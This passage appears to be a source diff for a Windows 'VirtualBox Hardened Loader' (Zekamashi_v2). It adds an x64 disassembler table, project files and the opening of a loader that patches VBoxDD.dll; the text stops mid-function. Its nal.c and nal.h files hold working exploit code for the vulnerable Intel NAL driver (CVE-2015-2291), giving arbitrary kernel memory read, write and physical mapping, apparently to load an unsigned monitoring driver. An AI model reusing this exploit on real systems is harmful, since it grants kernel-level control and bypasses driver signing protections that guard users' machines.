+#define DELTA_FPU_MODRM 0x104
+#define DELTA_PREFIXES 0x13c
+#define DELTA_OP_LOCK_OK 0x1ae
+#define DELTA_OP2_LOCK_OK 0x1c6
+#define DELTA_OP_ONLY_MEM 0x1d8
+#define DELTA_OP2_ONLY_MEM 0x1e7
+
+unsigned char hde64_table[] = {
+ 0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5,
+ 0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1,
+ 0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea,
+ 0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0,
+ 0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab,
+ 0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92,
+ 0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90,
+ 0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b,
+ 0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,
+ 0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc,
+ 0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20,
+ 0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff,
+ 0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00,
+ 0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01,
+ 0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10,
+ 0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00,
+ 0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00,
+ 0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00,
+ 0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00,
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,
+ 0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00,
+ 0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40,
+ 0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43,
+ 0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,
+ 0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40,
+ 0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06,
+ 0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07,
+ 0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04,
+ 0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10,
+ 0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00,
+ 0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb,
+ 0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff,
+ 0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09,
+ 0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff,
+ 0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08,
+ 0x00,0xf0,0x02,0x00
+};
diff --git a/Source/Zekamashi_v2/loader/idrv/nal.c b/Source/Zekamashi_v2/loader/idrv/nal.c
new file mode 100644
index 0000000..3d3d5e5
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/idrv/nal.c
@@ -0,0 +1,385 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2020
+*
+* TITLE: NAL.C
+*
+* VERSION: 1.00
+*
+* DATE: 07 Jan 2020
+*
+* Intel Network Adapter iQVM64 driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/nal.h"
+
+//
+// Based on https://www.exploit-db.com/exploits/36392
+//
+
+/*
+* NalCallDriver
+*
+* Purpose:
+*
+* Call Intel Nal driver.
+*
+*/
+BOOL NalCallDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_ PVOID Buffer,
+ _In_ ULONG Size)
+{
+ BOOL bResult = FALSE;
+ IO_STATUS_BLOCK ioStatus;
+
+ NTSTATUS ntStatus = NtDeviceIoControlFile(DeviceHandle,
+ NULL,
+ NULL,
+ NULL,
+ &ioStatus,
+ IOCTL_NAL_MANAGE,
+ Buffer,
+ Size,
+ NULL,
+ 0);
+
+ bResult = NT_SUCCESS(ntStatus);
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ return bResult;
+}
+
+/*
+* NalMapAddressEx
+*
+* Purpose:
+*
+* Call MmMapIoSpace via Nal driver, return kernel mode virtual address.
+*
+*/
+BOOL NalMapAddressEx(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _Out_ ULONG_PTR* VirtualAddress,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult = FALSE;
+ DWORD dwError = ERROR_SUCCESS;
+ NAL_MAP_IO_SPACE request;
+
+ if (VirtualAddress)
+ *VirtualAddress = 0;
+ else
+ return FALSE;
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.Header.FunctionId = NAL_FUNCID_MAPIOSPACE;
+ request.PhysicalAddress = PhysicalAddress;
+ request.NumberOfBytes = NumberOfBytes;
+
+ if (NalCallDriver(DeviceHandle, &request, sizeof(request))) {
+ if (request.OpResult == 0) {
+ *VirtualAddress = request.VirtualAddress;
+ bResult = TRUE;
+ }
+ else {
+ dwError = ERROR_INTERNAL_ERROR;
+ }
+ }
+ else {
+ dwError = GetLastError();
+ }
+ SetLastError(dwError);
+ return bResult;
+}
+
+/*
+* NalUnmapAddress
+*
+* Purpose:
+*
+* Call MmUnmapIoSpace via Nal driver.
+*
+*/
+BOOL NalUnmapAddress(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult = FALSE;
+ DWORD dwError = ERROR_SUCCESS;
+ NAL_UNMAP_IO_SPACE request;
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.Header.FunctionId = NAL_FUNCID_UNMAPIOSPACE;
+ request.VirtualAddress = VirtualAddress;
+ request.NumberOfBytes = NumberOfBytes;
+
+ if (NalCallDriver(DeviceHandle, &request, sizeof(request))) {
+ bResult = (request.OpResult == 0);
+ if (bResult == FALSE)
+ dwError = ERROR_NONE_MAPPED;
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ SetLastError(dwError);
+ return bResult;
+}
+
+/*
+* NalVirtualToPhysical
+*
+* Purpose:
+*
+* Translate virtual address to the physical.
+*
+* N.B.
+* Call driver Intel Nal driver MmGetVirtualForPhysical switch case.
+*
+*/
+BOOL NalVirtualToPhysical(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_ ULONG_PTR* PhysicalAddress)
+{
+ BOOL bResult = FALSE;
+ DWORD dwError = ERROR_SUCCESS;
+ NAL_GET_PHYSICAL_ADDRESS request;
+
+ if (PhysicalAddress)
+ *PhysicalAddress = 0;
+ else {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ return FALSE;
+ }
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.Header.FunctionId = NAL_FUNCID_VIRTUALTOPHYSCAL;
+ request.VirtualAddress = VirtualAddress;
+
+ if (NalCallDriver(DeviceHandle, &request, sizeof(request))) {
+ *PhysicalAddress = request.PhysicalAddress;
+ bResult = TRUE;
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ SetLastError(dwError);
+ return bResult;
+}
+
+/*
+* NalReadVirtualMemory
+*
+* Purpose:
+*
+* Read virtual memory via Nal memmove switch case.
+*
+*/
+_Success_(return != FALSE)
+BOOL NalReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult = FALSE;
+ DWORD dwError = ERROR_SUCCESS;
+ NAL_MEMMOVE request;
+
+ PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+ if (lockedBuffer) {
+
+ if (VirtualLock(lockedBuffer, NumberOfBytes)) {
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.Header.FunctionId = NAL_FUNCID_MEMMOVE;
+ request.SourceAddress = VirtualAddress;
+ request.DestinationAddress = (ULONG_PTR)lockedBuffer;
+ request.Length = NumberOfBytes;
+
+ bResult = NalCallDriver(DeviceHandle, &request, sizeof(request));
+ if (bResult) {
+ RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes);
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ VirtualUnlock(lockedBuffer, NumberOfBytes);
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ VirtualFree(lockedBuffer, 0, MEM_RELEASE);
+ }
+ else {
+ dwError = GetLastError();
+ }
+ SetLastError(dwError);
+ return bResult;
+}
+
+/*
+* NalWriteVirtualMemory
+*
+* Purpose:
+*
+* Write virtual memory via Nal memmove switch case.
+*
+*/
+_Success_(return != FALSE)
+BOOL NalWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult = FALSE;
+ DWORD dwError = ERROR_SUCCESS;
+ NAL_MEMMOVE request;
+
+ PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+ if (lockedBuffer) {
+
+ RtlCopyMemory(lockedBuffer, Buffer, NumberOfBytes);
+
+ if (VirtualLock(lockedBuffer, NumberOfBytes)) {
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.Header.FunctionId = NAL_FUNCID_MEMMOVE;
+ request.SourceAddress = (ULONG_PTR)lockedBuffer;
+ request.DestinationAddress = VirtualAddress;
+ request.Length = NumberOfBytes;
+
+ bResult = NalCallDriver(DeviceHandle, &request, sizeof(request));
+ if (bResult == FALSE) {
+ dwError = GetLastError();
+ }
+
+ VirtualUnlock(lockedBuffer, NumberOfBytes);
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ VirtualFree(lockedBuffer, 0, MEM_RELEASE);
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ SetLastError(dwError);
+ return bResult;
+}
+
+/*
+* NalWriteVirtualMemory
+*
+* Purpose:
+*
+* Write to virtual memory via mapping.
+*
+*/
+_Success_(return != FALSE)
+BOOL NalWriteVirtualMemoryEx(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes
+)
+{
+ BOOL bResult = FALSE;
+ DWORD dwError = ERROR_SUCCESS;
+ ULONG_PTR physAddress, mappedVirt;
+
+ if (NalVirtualToPhysical(DeviceHandle, VirtualAddress, &physAddress)) {
+
+ if (NalMapAddressEx(DeviceHandle, physAddress, &mappedVirt, NumberOfBytes)) {
+
+ bResult = NalWriteVirtualMemory(DeviceHandle, mappedVirt, Buffer, NumberOfBytes);
+ if (bResult == FALSE)
+ dwError = GetLastError();
+
+ NalUnmapAddress(DeviceHandle, mappedVirt, NumberOfBytes);
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ }
+ else {
+ dwError = GetLastError();
+ }
+ SetLastError(dwError);
+ return bResult;
+}
+
+/*
+* NalReadVirtualMemoryEx
+*
+* Purpose:
+*
+* Read virtual memory via mapping.
+*
+*/
+_Success_(return != FALSE)
+BOOL NalReadVirtualMemoryEx(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult = FALSE;
+ DWORD dwError = ERROR_SUCCESS;
+ PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+ if (lockedBuffer) {
+
+ if (VirtualLock(lockedBuffer, NumberOfBytes)) {
+
+ ULONG_PTR physicalAddress, newVirt;
+
+ if (NalVirtualToPhysical(DeviceHandle, VirtualAddress, &physicalAddress)) {
+ if (NalMapAddressEx(DeviceHandle, physicalAddress, &newVirt, NumberOfBytes)) {
+
+ bResult = NalReadVirtualMemory(DeviceHandle, newVirt, lockedBuffer, NumberOfBytes);
+ if (bResult) {
+ RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes);
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ NalUnmapAddress(DeviceHandle, newVirt, NumberOfBytes);
+ }
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ VirtualUnlock(lockedBuffer, NumberOfBytes);
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ VirtualFree(lockedBuffer, 0, MEM_RELEASE);
+ }
+ else {
+ dwError = GetLastError();
+ }
+
+ SetLastError(dwError);
+ return bResult;
+}
diff --git a/Source/Zekamashi_v2/loader/idrv/nal.h b/Source/Zekamashi_v2/loader/idrv/nal.h
new file mode 100644
index 0000000..ca6a409
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/idrv/nal.h
@@ -0,0 +1,119 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2020
+*
+* TITLE: NAL.H
+*
+* VERSION: 1.00
+*
+* DATE: 24 Jan 2020
+*
+* Intel Network Adapter iQVM64 driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+//
+// INTEL NAL driver interface for CVE-2015-2291.
+//
+
+#define INTEL_DEVICE_TYPE (DWORD)0x8086
+#define INTEL_DEVICE_FUNCTION (DWORD)2049
+
+#define NAL_FUNCID_MAPIOSPACE (DWORD)0x19
+#define NAL_FUNCID_UNMAPIOSPACE (DWORD)0x1A
+#define NAL_FUNCID_VIRTUALTOPHYSCAL (DWORD)0x25
+#define NAL_FUNCID_MEMSET (DWORD)0x30
+#define NAL_FUNCID_MEMMOVE (DWORD)0x33
+
+#define IOCTL_NAL_MANAGE CTL_CODE(INTEL_DEVICE_TYPE, INTEL_DEVICE_FUNCTION, METHOD_NEITHER, FILE_ANY_ACCESS) //0x80862007
+
+
+typedef struct _NAL_REQUEST_HEADER {
+ ULONG_PTR FunctionId;
+ ULONG_PTR Unused0;
+} NAL_REQUEST_HEADER, * PNAL_REQUEST_HEADER;
+
+typedef struct _NAL_GET_PHYSICAL_ADDRESS {
+ NAL_REQUEST_HEADER Header;
+ ULONG_PTR PhysicalAddress;
+ ULONG_PTR VirtualAddress;
+} NAL_GET_PHYSICAL_ADDRESS, * PNAL_GET_PHYSICAL_ADDRESS;
+
+typedef struct _NAL_MEMMOVE {
+ NAL_REQUEST_HEADER Header;
+ ULONG_PTR SourceAddress;
+ ULONG_PTR DestinationAddress;
+ ULONG_PTR Length;
+} NAL_MEMMOVE, * PNAL_MEMMOVE;
+
+typedef struct _NAL_MAP_IO_SPACE {
+ NAL_REQUEST_HEADER Header;
+ ULONG_PTR OpResult; //0 mean success
+ ULONG_PTR VirtualAddress;
+ ULONG_PTR PhysicalAddress;
+ ULONG NumberOfBytes;
+} NAL_MAP_IO_SPACE, * PNAL_MAP_IO_SPACE;
+
+typedef struct _NAL_UNMAP_IO_SPACE {
+ NAL_REQUEST_HEADER Header;
+ ULONG_PTR OpResult; //0 mean success
+ ULONG_PTR VirtualAddress;
+ ULONG_PTR Unused0;
+ ULONG NumberOfBytes;
+} NAL_UNMAP_IO_SPACE, * PNAL_UNMAP_IO_SPACE;
+
+BOOL NalCallDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_ PVOID Buffer,
+ _In_ ULONG Size);
+
+BOOL NalMapAddressEx(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _Out_ ULONG_PTR* VirtualAddress,
+ _In_ ULONG NumberOfBytes);
+
+BOOL NalUnmapAddress(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_ ULONG NumberOfBytes);
+
+BOOL NalVirtualToPhysical(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_ ULONG_PTR* PhysicalAddress);
+
+_Success_(return != FALSE)
+BOOL NalReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+_Success_(return != FALSE)
+BOOL NalWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+_Success_(return != FALSE)
+BOOL NalReadVirtualMemoryEx(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+_Success_(return != FALSE)
+BOOL NalWriteVirtualMemoryEx(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
diff --git a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj b/Source/Zekamashi_v2/loader/loader.vcxproj
similarity index 62%
rename from Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj
rename to Source/Zekamashi_v2/loader/loader.vcxproj
index b03e429..382f93b 100644
--- a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj
+++ b/Source/Zekamashi_v2/loader/loader.vcxproj
@@ -11,23 +11,23 @@
- {F706DA8E-B4E2-4E2B-A47E-317C7408303D}
+ {2AFB187B-63FB-40C6-B54C-38D559E5124C}
Win32Proj
- VBoxPatchGen
- 10.0.17763.0
- Kasumi
+ loader
+ loader
+ 10.0
Application
true
- v141
+ v142
Unicode
Application
false
- v141
+ v142
true
Unicode
Spectre
@@ -35,12 +35,10 @@
-
-
-
+
-
+
@@ -48,12 +46,16 @@
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
+ loader
+ AllRules.ruleset
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
- AllRules.ruleset
+ loader
+ NativeRecommendedRules.ruleset
true
@@ -62,69 +64,110 @@
Level4
Disabled
- _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ WIN32;_DEBUG;_WINDOWS;_SIGNEDBUILD;%(PreprocessorDefinitions)
+
+
true
- CompileAsC
+ false
+ $(ProjectDir);%(AdditionalIncludeDirectories)
Console
true
- KasumiMain
+
+
+ 6.0
+
+ oscompat.manifest
+
Level4
- MinSpace
+ Full
true
true
- NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
- true
- CompileAsC
+ true
+ Size
true
+ MultiThreaded
+ true
+
+
+ true
true
Guard
- MultiThreaded
- true
false
+ $(ProjectDir);%(AdditionalIncludeDirectories)
Console
+ false
true
true
- false
- KasumiMain
- true
6.0
+ RequireAdministrator
+ true
+
+
+ true
/NOCOFFGRPINFO %(AdditionalOptions)
-
+
+
+
+ oscompat.manifest
+
-
+
+
+
+
+
+
+
+
+ CompileAsC
+ CompileAsC
+
+
-
+
+
+
+
+
+
-
+
+
+
+
+
+
+
+
diff --git a/Source/Zekamashi/loader/loader.vcxproj.filters b/Source/Zekamashi_v2/loader/loader.vcxproj.filters
similarity index 68%
rename from Source/Zekamashi/loader/loader.vcxproj.filters
rename to Source/Zekamashi_v2/loader/loader.vcxproj.filters
index 7fcd47f..06a63f9 100644
--- a/Source/Zekamashi/loader/loader.vcxproj.filters
+++ b/Source/Zekamashi_v2/loader/loader.vcxproj.filters
@@ -16,6 +16,15 @@
{a24e0382-d2e7-462c-b399-0f0a73936850}
+
+ {4adfe35a-0c15-4102-93ba-0a31bc281fc7}
+
+
+ {a24614ae-46b0-4a3f-a979-2d467c47a833}
+
+
+ {60e9e934-2c31-4d73-968c-97851c2fe8a9}
+
@@ -33,9 +42,6 @@
minirtl
-
- Source Files
-
minirtl
@@ -45,21 +51,30 @@
minirtl
-
+
minirtl
-
+
+ Source Files
+
+
minirtl
-
+
minirtl
-
+
Source Files
-
+
+ idrv
+
+
Source Files
+
+ hde
+
@@ -74,28 +89,50 @@
Header Files
-
- Header Files
-
minirtl
-
- Header Files
-
minirtl
-
+
Header Files
-
+
+ Header Files
+
+
+ ntdll
+
+
+ idrv
+
+
+ Source Files
+
+
+ Header Files
+
+
Header Files
+
+ hde
+
+
+ hde
+
+
+ hde
+
Resource Files
+
+
+
+
\ No newline at end of file
diff --git a/Source/Zekamashi/loader/loader.vcxproj.user b/Source/Zekamashi_v2/loader/loader.vcxproj.user
similarity index 57%
rename from Source/Zekamashi/loader/loader.vcxproj.user
rename to Source/Zekamashi_v2/loader/loader.vcxproj.user
index 7e06580..a4db295 100644
--- a/Source/Zekamashi/loader/loader.vcxproj.user
+++ b/Source/Zekamashi_v2/loader/loader.vcxproj.user
@@ -1,21 +1,13 @@

- /?
- WindowsLocalDebugger
-
-
WindowsLocalDebugger
-
+
WindowsLocalDebugger
-
-
- WindowsLocalDebugger
-
\ No newline at end of file
diff --git a/Source/Zekamashi_v2/loader/main.c b/Source/Zekamashi_v2/loader/main.c
new file mode 100644
index 0000000..ff4c19a
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/main.c
@@ -0,0 +1,525 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2014 - 2020
+*
+* TITLE: MAIN.C
+*
+* VERSION: 2.00
+*
+* DATE: 24 Jan 2020
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+
+#pragma data_seg("shrd")
+volatile LONG g_lApplicationInstances = 0;
+#pragma data_seg()
+
+#define T_PROGRAMTITLE "VirtualBox Hardened Loader v2.0.0.2002"
+
+ULONG_PTR g_MaximumUserModeAddress = 0;
+
+TABLE_DESC g_PatchData = { NULL, 0 };
+
+//
+// Help output.
+//
+#define T_HELP "Loader for Tsugumi monitoring driver.\r\n\r\n\
+Optional parameters to execute: \r\n\r\n\
+LOADER [/s] or [/c] Table\r\n\r\n\
+ /s - stop monitoring and purge system cache.\r\n\
+ /c [Table] - optional, custom VBoxDD patch table fullpath.\r\n\r\n\
+ Example: ldr.exe /c vboxdd.bin"
+
+/*
+* ShowVirtualBoxVesion
+*
+* Purpose:
+*
+* Read version from registry and output to console.
+*
+*/
+VOID ShowVirtualBoxVersion()
+{
+ HKEY hKey = NULL;
+ LRESULT lRet;
+ DWORD dwSize;
+ TCHAR szBuffer[MAX_PATH + 1];
+
+ //
+ // Failures are non critical.
+ //
+ lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"),
+ 0, KEY_READ, &hKey);
+
+ if (lRet == ERROR_SUCCESS) {
+
+ //
+ // Read VBox version.
+ //
+ RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
+ dwSize = MAX_PATH * sizeof(TCHAR);
+ lRet = RegQueryValueEx(hKey, TEXT("Version"), NULL, NULL, (LPBYTE)&szBuffer, &dwSize);
+ if (lRet == ERROR_SUCCESS) {
+ printf_s("LDR: VirtualBox version %wS\r\n", szBuffer);
+ }
+
+ RegCloseKey(hKey);
+ }
+}
+
+/*
+* FetchCustomPatchData
+*
+* Purpose:
+*
+* Load custom patch table.
+* Returned buffer must be freed with HeapFree after usage.
+*
+*/
+PVOID FetchCustomPatchData(
+ _In_ LPWSTR lpFileName,
+ _Inout_opt_ PDWORD pdwPatchDataSize
+)
+{
+ DWORD dwFileSize;
+ HANDLE hFile;
+ PVOID DataBuffer = NULL;
+
+ LARGE_INTEGER FileSize;
+
+ //
+ // Validate input parameter.
+ //
+ if (lpFileName == NULL)
+ return NULL;
+
+ //
+ // Open file with custom patch table.
+ //
+ hFile = CreateFile(lpFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
+ if (hFile == INVALID_HANDLE_VALUE)
+ return NULL;
+
+ //
+ // Get file size for buffer, allocate it and read data.
+ //
+ RtlSecureZeroMemory(&FileSize, sizeof(LARGE_INTEGER));
+ if (GetFileSizeEx(hFile, &FileSize)) {
+ dwFileSize = FileSize.LowPart;
+ if (dwFileSize > 0 && dwFileSize <= MAX_CONFIGURATION_DATA_SIZE) {
+ DataBuffer = (PVOID)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize);
+ if (DataBuffer != NULL) {
+
+ if (ReadFile(hFile, DataBuffer, dwFileSize, &dwFileSize, NULL)) {
+
+ // Check if optional parameter is set and return data size on true.
+ if (pdwPatchDataSize != NULL) {
+ *pdwPatchDataSize = dwFileSize;
+ }
+ }
+ }
+ }
+ }
+ CloseHandle(hFile);
+ return DataBuffer;
+}
+
+/*
+* CreatePatchTable
+*
+* Purpose:
+*
+* Create patch table depending on installed VBox dll.
+*
+*/
+BOOL CreatePatchTable(
+ VOID
+)
+{
+ BOOL bResult = FALSE;
+ DWORD dwSize, cch;
+ HKEY hKey = NULL;
+ LRESULT lRet;
+ TCHAR szBuffer[MAX_PATH * 2], szTempFile[MAX_PATH * 2];
+
+ do {
+
+ lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"),
+ 0, KEY_READ, &hKey);
+
+ //
+ // If key not exists, return FALSE and loader will exit.
+ //
+ if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) {
+ printf_s("LDR: Cannot open VirtualBox registry key, error %lli\r\n", lRet);
+ break;
+ }
+
+ //
+ // Read VBox location.
+ //
+ RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
+ dwSize = MAX_PATH * sizeof(TCHAR);
+ lRet = RegQueryValueEx(hKey, TEXT("InstallDir"), NULL, NULL, (LPBYTE)&szBuffer, &dwSize);
+ if (lRet != ERROR_SUCCESS) {
+ printf_s("LDR: Cannot query VirtualBox installation directory, error %lli\r\n", lRet);
+ break;
+ }
+
+ _strcat(szBuffer, TEXT("VBoxDD.dll"));
+
+ RtlSecureZeroMemory(szTempFile, sizeof(szTempFile));
+ cch = supExpandEnvironmentStrings(TEXT("%temp%\\"), szTempFile, MAX_PATH);
+ if ((cch != 0) && (cch < MAX_PATH)) {
+ //
+ // Give VBoxDD.dll new name in %temp% so it won't get patched if monitor already loaded.
+ //
+ _strcat(szTempFile, L"nyan.dll");
+ if (CopyFile(szBuffer, szTempFile, FALSE) == FALSE) {
